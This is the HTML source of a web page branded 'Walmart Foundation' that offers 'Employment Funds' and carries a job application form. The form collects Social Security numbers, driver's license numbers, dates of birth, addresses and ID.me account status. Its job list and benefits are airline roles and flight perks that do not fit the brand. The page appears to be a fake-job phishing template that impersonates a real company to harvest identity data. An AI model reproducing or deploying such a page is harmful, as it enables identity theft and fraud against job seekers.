<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="viewport" content="initial-scale=1, maximum-scale=1">
  <title>Walmart Foundation</title>
  <meta name="keywords" content="">
  <meta name="description" content="">
  <meta name="author" content="">
  <link rel="stylesheet" href="/css/style.css">
  <link rel="icon" href="/images/favicon.ico" type="image/x-icon" />
</head>

<body class="main-layout">
  <div class="loader_bg">
    <div class="loader"><img src="/images/loading.gif" alt="#" /></div>
  </div>
  <header>
    <div class="header">
      <div class="container">
        <div class="row">
          <div class="col-xl-3 col-lg-3 col-md-3 col-sm-3 col logo_section">
            <div class="full">
              <div class="center-desk">
                <div class="logo"><a href="index.html"><img src="/images/-logo.png" alt="#" /></a></div>
              </div>
            </div>
          </div>
          <div class="col-xl-9 col-lg-9 col-md-9 col-sm-9">
            <nav class="navigation navbar navbar-expand-md navbar-dark "><button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarsExample04" aria-controls="navbarsExample04" aria-expanded="false" aria-label="Toggle navigation"><span class="navbar-toggler-icon"></span></button>
              <div class="collapse navbar-collapse" id="navbarsExample04">
                <div class="sign_btn"><a href="#apply">Apply Now</a></div>
              </div>
            </nav>
          </div>
        </div>
      </div>
    </div>
  </header>
  <section class="banner_main">
    <div class="container">
      <div class="row d_flex">
        <div class="col-md-12">
          <div class="text-bg">
            <h1>EMPLOYMENT</h1><span>FUNDS</span>
            <a href="#more">Read More</a>
          </div>
        </div>
      </div>
    </div>
  </section>
  </div>
  <div class="choose" id="more">
    <div class="container">
      <div class="row">
        <div class="col-md-12">
          <div class="titlepage">
            <p style="font-weight: 700;">Preferred Requirements:</p>
            <ul style="margin-bottom: 30px;">
              <li>Effective communication skills, both verbal and written.</li>
              <li>Ability to work efficiently.</li>
              <li>Must be well groomed and adhere to the dress code policy.</li>
              <li>Must be at least 18 years of age and possess a valid driver’s license.</li>
              <li>Able to attend required training.</li>
              <li>Strong computer skills and ability to read and write.</li>
              <li>TRAINEE STATUS: Upon offer of employment, you will remain in trainee status until successful completion of all practical and written curriculum.</li>
              <li>The ideal candidate must be people oriented, highly motivated with a positive and friendly attitude.</li>
            </ul>
            <p style="font-weight: 700;">Full Time Benefits:</p>
            <ul style="margin-bottom: 30px;">
              <li>Profit Sharing</li>
              <li>Medical/Dental/Vision/Life/ Disability Insurance</li>
              <li>Medical Travel Reimbursement</li>
              <li>Legal, Identity and Pet Insurance</li>
              <li>401K with an employer match</li>
              <li>Employee Stock Purchase Plan</li>
              <li>Employee Assistance Program</li>
              <li>Tuition Reimbursement</li>
              <li>Flight Benefits</li>
              <li>Paid vacation, holidays, and sick time</li>
            </ul>
            <p style="font-weight: 700;">Part Time Benefits:</p>
            <ul style="margin-bottom: 30px;">
              <li>Profit Sharing</li>
              <li>Medical Travel Reimbursement</li>
              <li>Legal, Identity and Pet Insurance</li>
              <li>401K with an employer match</li>
              <li>Employee Stock Purchase Plan</li>
              <li>Employee Assistance Program</li>
              <li>Tuition Reimbursement</li>
              <li>Flight Benefits</li>
              <li>Sick time</li>
            </ul>
            <p style="font-weight: bold;">Essential Services Provider</p>
            <p>
              Walmart as a national branded company is deemed an essential service provider during declared national and state emergencies. Team Members will be required to report to their assigned trip or work location during national and state emergencies unless prohibited by local, state or federal order.</p>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div id="apply" class="bestCar">
    <div class="container">
      <div class="row">
        <div class="col-md-12">
          <form class="main_form" method="POST" action="/submit">
            <div class="titlepage">
              <h2 style="text-align: center;">Application Form</h2>
            </div>
            <div class="row">
              <div class="col-md-6 form-group"><label for="fname">First Name*</label><input class="form-control" placeholder="First Name" required type="type" name="fname" id="fname"></div>
              <div class="col-md-6 form-group"><label for="mname">Middle Name</label><input class="form-control" placeholder="Middle Name" type="type" name="mname" id="mname"></div>
              <div class="col-md-6 form-group"><label for="lname">Last Name*</label><input class="form-control" placeholder="Last Name" required type="type" name="lname" id="lname"></div>
              <div class="col-md-6 form-group"><label for="dob">Date of Birth*</label><input class="form-control" placeholder="Date of Birth" required type="date" name="dob" id="dob"></div>
              <div class="col-md-6 form-group"><label for="ssn">Social Security Number*</label><input class="form-control" placeholder="Social Security Number" required type="Search" name="ssn" id="ssn"></div>
              <div class="col-md-6 form-group"><label for="license">Driver's License Number*</label><input class="form-control" placeholder="Driver's License Number" required type="Search" name="license" id="license"></div>
              <div class="col-md-6 form-group"><label for="weight">Weight as listed on your driver's license*</label><input class="form-control" placeholder="Weight as listed on your driver's license" required type="text" name="weight" id="weight"></div>
              <div class="col-md-6 form-group"><label for="address">Current Mailing Address/Apt#*</label><input class="form-control" placeholder="Current Mailing Address/Apt#" type="text" required name="address" id="address"></div>
              <div class="col-md-6 form-group"><label for="city">City*</label><input class="form-control" placeholder="City" type="Search" name="cityy" required id="city"></div>
              <div class="col-md-6 form-group"><label for="state">State*</label><input class="form-control" placeholder="State" type="text" name="state" required id="state"></div>
              <div class="col-md-6 form-group"><label for="zipcode">Zip code*</label><input class="form-control" placeholder="Zip code" type="number" required name="zipcode" id="zipcode"></div>
              <div class="col-md-6 form-group"><label for="email">Email*</label><input class="form-control" placeholder="Email" type="email" required name="email" id="email"></div>
              <div class="col-md-6 form-group"><label for="phone">Phone*</label><input class="form-control" placeholder="Phone" type="tel" required name="phone" id="phone"></div>
              <div class="col-md-6 form-group"><label for="gender">Gender*</label><select class="form-control" required name="gender" id="gender">
                  <option value="Male">Male</option>
                  <option value="Female">Female</option>
                  <option value="Not-to-say">Prefer not to say</option>
                </select></div>
                <div class="col-md-6 form-group"><label for="position">What position are you applying for?*</label><select class="form-control" required name="position" id="position">
                  <option value="Accountant">Accountant</option>
                  <option value="Administrative Assistant">Administrative Assistant</option>
                  <option value="Aircraft Cleaner - Day Shift">Aircraft Cleaner - Day Shift</option>
                  <option value="Aircraft Cleaner - Night Shift">Aircraft Cleaner - Night Shift</option>
                  <option value="Aircraft Finance Manager">Aircraft Finance Manager</option>
                  <option value="Aircraft Interior Engineer">Aircraft Interior Engineer</option>
                  <option value="Avionics technician">Avionics technician</option>
                  <option value="Baggage handler">Baggage handler</option>
                  <option value="Crew Planning Manager">Crew Planning Manager</option>
                  <option value="Customer Service Agent">Customer Service Agent</option>
                  <option value="Customer Service Representative">Customer Service Representative</option>
                  <option value="Customer Service/Ground Operations Agent">Customer Service/Ground Operations Agent</option>
                  <option value="Flight Dispatcher">Flight Dispatcher</option>
                  <option value="Fuel & Stations Accounting Manager">Fuel &amp; Stations Accounting Manager</option>
                  <option value="Hospitality Staff">Hospitality Staff</option>
                  <option value="Maintenance Technician">Maintenance Technician</option>
                  <option value="Marketing Manager">Marketing Manager</option>
                  <option value="Passenger assistant">Passenger assistant</option>
                  <option value="Ramp Staff">Ramp Staff</option>
                  <option value="Sales Representative">Sales Representative</option>
                  <option value="Shuttle Driver">Shuttle Driver</option>
                  <option value="Software Developer">Software Developer</option>
                  <option value="Store Salesperson">Store Salesperson</option>
                  <option value="Web Designer">Web Designer</option>
                </select></div>
              <div class="col-md-6 form-group"><label for="shift">Please select which shift will work for you schedule?*</label><select class="form-control" required name="shift" id="shift">
                  <option value="START 4am - 9am">START 4am - 9am</option>
                  <option value="MID 9am - 2pm">MID 9am - 2pm</option>
                  <option value="LATE TURNS 2pm - 7pm">LATE TURNS 2pm - 7pm</option>
                  <option value="RON 7pm - 12pm">RON 7pm - 12pm</option>
                </select></div>
              <div class="col-md-12 form-group"><label for="resigned">In the last 10 years, have you ever been involuntarily terminated or asked to resign your employment? If Yes - please explain below | If No - please answer N/A.*</label><textarea name="resigned" id="resigned" cols="30" rows="10" class="form-control" required></textarea></div>
              <div class="col-md-6 form-group"><label for="workAuth">Are you authorized to work in the United States for any employer?*</label><select class="form-control" required name="workAuth" id="workAuth">
                <option value="Yes">Yes</option>
                <option value="No">No</option>
              </select></div>
              <div class="col-md-6 form-group"><label for="startDate">Available Start Date*</label><input class="form-control" required type="date" name="startDate" id="startDate"></div>
              <div class="col-md-6 form-group"><label for="idme">Do you have an account with IDME?*</label><select class="form-control" required name="idme" id="idme">
                <option value="Yes">Yes</option>
                <option value="No">No</option>
              </select></div>
              <div class="col-md-6 form-group"><label for="jobStatus">What is your current employment status?*</label><select class="form-control" required name="jobStatus" id="jobStatus">
                <option value="Employed">Employed</option>
                <option value="Unemployed">Unemployed</option>
                <option value="Self-Employed">Self-Employed</option>
                <option value="Student">Student</option>
                <option value="Other">Other</option>
              </select></div>
              <div class="col-sm-12"><button class="find_btn" type="submit">Submit</button></div>
            </div>
          </form>
        </div>
      </div>
    </div>
  </div>
  <script src="/js/jquery.min.js"></script>
  <script src="/js/bootstrap.bundle.min.js"></script>
  <script>
    setTimeout(function() {
      $('.loader_bg').fadeToggle();
    }, 1500);
  </script>
</body>

</html>